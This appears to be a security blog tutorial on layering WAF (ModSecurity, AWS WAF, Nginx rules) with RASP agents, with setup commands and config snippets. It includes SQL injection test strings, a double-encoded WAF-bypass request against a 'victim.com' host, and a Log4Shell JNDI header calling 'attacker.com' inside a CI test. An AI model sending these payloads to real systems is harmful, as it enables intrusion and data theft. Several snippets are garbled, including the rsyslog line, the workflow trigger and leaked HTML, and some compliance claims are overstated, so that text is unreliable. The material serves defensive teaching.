Listen to this Post
Introduction:
Web Application Firewalls (WAFs) filter malicious traffic at the network edge, blocking SQLi, XSS, and DDoS attacks before they reach your app. Runtime Application Self-Protection (RASP) lives inside the application, monitoring actual code execution and API calls to stop zero-day exploits that bypass perimeter defenses. Combining both creates a layered security architecture that protects from the outside in and the inside out.
Learning Objectives:
- Understand the architectural differences between WAF and RASP, including deployment models and detection logic.
- Implement a basic WAF rule set using ModSecurity on Linux and configure RASP hooks in a sample Java web app.
- Analyze attack scenarios (SQL injection, Log4j) to determine which technology mitigates which phase of the kill chain.
You Should Know:
- Deploying Open Source WAF with ModSecurity on Ubuntu 22.04
ModSecurity is the industry-standard open-source WAF engine. The following commands install it with OWASP Core Rule Set (CRS) for Apache2.
Step-by-step guide – What this does:
This setup places a reverse-proxy style filter in front of your web server. Every HTTP request is inspected against CRS rules; malicious payloads are blocked before reaching the app logic.
Update system and install Apache2 with ModSecurity sudo apt update && sudo apt upgrade -y sudo apt install apache2 libapache2-mod-security2 -y Enable the module and restart Apache sudo a2enmod security2 sudo systemctl restart apache2 Download and configure OWASP CRS cd /tmp git clone https://github.com/coreruleset/coreruleset.git sudo cp -r coreruleset/rules /usr/share/modsecurity-crs/ sudo cp coreruleset/crs-setup.conf.example /etc/modsecurity/crs-setup.conf Enable CRS in ModSecurity config sudo sed -i 's/SecRuleEngine DetectionOnly/SecRuleEngine On/' /etc/modsecurity/modsecurity.conf sudo sed -i 's/SecDefaultAction "phase:1,log,auditlog,pass"/SecDefaultAction "phase:1,log,auditlog,deny,status:403"/' /etc/modsecurity/crs-setup.conf Test with a SQLi attempt curl "http://localhost/index.php?id=1' OR '1'='1" -I Expected: HTTP/1.1 403 Forbidden
Windows equivalent (IIS with ModSecurity via MSI):
Download ModSecurity for IIS from GitHub, install using the provided MSI, then edit `c:\Program Files\ModSecurity IIS\modsecurity.conf` to set `SecRuleEngine On` and include CRS rules.
- Instrumenting RASP Using OpenRASP in a Java Spring Boot App
OpenRASP is an open-source RASP engine that hooks into the JVM. It intercepts database queries, file system access, and command execution at runtime.
Step-by-step guide – What this does:
This adds a Java agent to your application JAR. The agent monitors actual method calls (e.g., Statement.executeQuery()) and blocks SQL injection even if WAF missed the encoded payload.
Download OpenRASP agent wget https://github.com/baidu/openrasp/releases/download/v1.3.6/openrasp-v1.3.6.zip unzip openrasp-v1.3.6.zip -d /opt/openrasp Configure protection (enable SQLi and command injection blocking) cat > /opt/openrasp/conf/openrasp.yml << EOF rasp: enabled: true action: block sql: enabled: true action: block command: enabled: true action: block log: level: INFO file: /var/log/openrasp/rasp.log EOF Run your Spring Boot app with the RASP agent java -javaagent:/opt/openrasp/rasp.jar -jar myapp.jar Test SQL injection (even if obfuscated) curl -X POST http://localhost:8080/login -d "user=admin' OR '1'='1&pass=anything" RASP intercepts at the JDBC layer – check /var/log/openrasp/rasp.log for block events
- API Security – Combining WAF Rate Limiting with RASP Input Validation
Modern APIs face abuse like credential stuffing and mass assignment. WAF can enforce rate limits at the edge; RASP validates the actual data binding in the controller.
Step-by-step guide – Nginx WAF rate limiting + custom RASP validation in Node.js
/etc/nginx/sites-available/api – WAF rate limit rules
limit_req_zone $binary_remote_addr zone=login:10m rate=5r/m;
server {
listen 443 ssl;
location /api/login {
limit_req zone=login burst=3 nodelay;
Block obvious SQLi patterns at WAF level
if ($request_body ~ "(\%27)|(\')|(--)|(\%23)") { return 403; }
proxy_pass http://localhost:3000;
}
}
// RASP validation inside Express.js – checks after parsing, before business logic
app.post('/api/login', (req, res) => {
// Runtime introspection: if user input contains SQL control chars but also attempts UNION
if (typeof req.body.user === 'string' && req.body.user.match(/(UNION|SELECT|INSERT)/i)) {
console.error(<code>RASP blocked malicious login attempt: ${req.body.user}</code>);
return res.status(403).json({ error: 'Invalid input' });
}
// Proceed only if safe
authenticate(req.body.user, req.body.pass);
});
- Cloud Hardening – Deploying AWS WAF + RASP on ECS with Fargate
In cloud environments, WAF is managed by the cloud provider; RASP runs inside containers. This section shows how to enable AWS WAF on an Application Load Balancer and embed RASP in a Docker image.
Step-by-step guide – Terraform snippet for AWS WAF ACL
resource "aws_wafv2_web_acl" "app_waf" {
name = "app-waf-rule"
scope = "REGIONAL"
default_action {
allow {}
}
rule {
name = "AWSManagedRulesSQLiRuleSet"
priority = 1
override_action {
none {}
}
statement {
managed_rule_group_statement {
name = "AWSManagedRulesSQLiRuleSet"
vendor_name = "AWS"
}
}
visibility_config {
cloudwatch_metrics_enabled = true
metric_name = "SQLiRuleMetric"
sampled_requests_enabled = true
}
}
}
Dockerfile with RASP agent for a Python Flask app (using open-source RASP like IAST-Python)
FROM python:3.9-slim WORKDIR /app COPY requirements.txt . RUN pip install --no-cache-dir -r requirements.txt COPY . . Inject RASP hook – wraps dangerous functions (eval, exec, SQL queries) RUN pip install pyrasp ENV PYTHONPATH=/usr/local/lib/python3.9/site-packages/pyrasp CMD ["python", "-m", "pyrasp.monitor", "app.py"]
- Vulnerability Exploitation – How Attackers Bypass WAF but Not RASP
WAF relies on pattern matching. Attackers use encoding, fragmentation, and HTTP parameter pollution to evade signatures. RASP sees the final, decoded value inside the application.
Step-by-step guide – Simulate a WAF bypass and observe RASP interception
1. Normal SQLi payload – WAF blocks curl "http://victim.com/page?id=1' UNION SELECT username,password FROM users--" <ol> <li>WAF bypass using double URL encoding (%25 -> % -> ' ) curl "http://victim.com/page?id=1%2527%20UNION%20SELECT%20username,password%20FROM%20users--" WAF sees "1%2527" (not a single quote), passes request. Backend decodes to "1' UNION..."</p></li> <li><p>RASP in Java – the PreparedStatement hook receives the decoded string OpenRASP log entry: [bash] SQLi detected - param: id = "1' UNION SELECT username,password FROM users--" Stack: com.mysql.jdbc.StatementImpl.executeQuery(StatementImpl.java:123)
Mitigation commands for Linux sysadmins – force RASP logging to SIEM
Forward RASP logs to syslog for centralized monitoring echo "local7. /var/log/openrasp/rasp.log" >> /etc/rsyslog.conf systemctl restart rsyslog Configure auditd to capture RASP agent tampering attempts auditctl -w /opt/openrasp/rasp.jar -p wa -k rasp_integrity
- Combining WAF and RASP in a DevSecOps Pipeline (CI/CD)
Automate security gate checks using both technologies during staging.
Step-by-step guide – GitHub Actions workflow that runs WAF rule tests and RASP telemetry validation
name: AppSec Pipeline
on: [bash]
jobs:
waf-test:
runs-on: ubuntu-latest
steps:
- name: Deploy test app with ModSecurity container
run: |
docker run -d -p 8080:80 --name waf-test owasp/modsecurity:apache
docker cp ./app waf-test:/var/www/html/
- name: Run malicious payload suite
run: |
curl -X POST http://localhost:8080/app/login -d "user=admin'--" -w "%{http_code}" -o /dev/null -s | grep 403
rasp-scan:
runs-on: ubuntu-latest
steps:
- name: Run OpenRASP enabled app in staging
run: |
java -javaagent:./rasp.jar -jar myapp-staging.jar &
sleep 10
Simulate Log4Shell attempt (JNDI injection)
curl -H "X-Api-Version: ${jndi:ldap://attacker.com/a}" http://localhost:8080/api/health
Check if RASP blocked it
grep "JNDI" /var/log/openrasp/rasp.log && exit 0 || exit 1
What Undercode Say:
- WAF is your front door guard, RASP is the room-by-room motion sensor. RASP stops attackers who slip past the perimeter using zero-day evasion techniques.
- Compliance without RASP is blind trust. Many standards (PCI DSS v4.0, OWASP ASVS) now require runtime self-protection for critical transaction paths.
- Performance trade-offs are real but manageable. WAF adds 2-5ms latency at edge; RASP adds 10-20ms inside the JVM. Use selective instrumentation for high-throughput endpoints.
The convergence of edge and internal protection represents a maturity shift from reactive signature matching to proactive behavioral analysis. Organizations that deploy both reduce mean time to detect (MTTD) from hours to milliseconds, as RASP can halt an exploit during the same HTTP request. However, RASP requires deep integration with the application framework—something legacy monolithic apps struggle with. Microservices and serverless architectures actually benefit more from RASP because each function can carry its own protection agent.
Prediction:
By 2028, standalone WAF appliances will decline as cloud-native WAAP (Web Application and API Protection) platforms absorb WAF capabilities. RASP will evolve into eBPF-based hooks on Linux kernels, enabling zero-instrumentation protection for containers and serverless functions. Attackers will shift to business logic abuse (e.g., gift card brute-forcing, workflow bypasses) that neither WAF signatures nor current RASP behavior models detect. The next arms race will be between RASP’s context-aware anomaly detection and AI-generated adversarial inputs designed to mimic legitimate user sessions.
▶️ Related Video (80% Match):
🎯Let’s Practice For Free:
IT/Security Reporter URL:
Reported By: Cybersecurity Appsec – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅
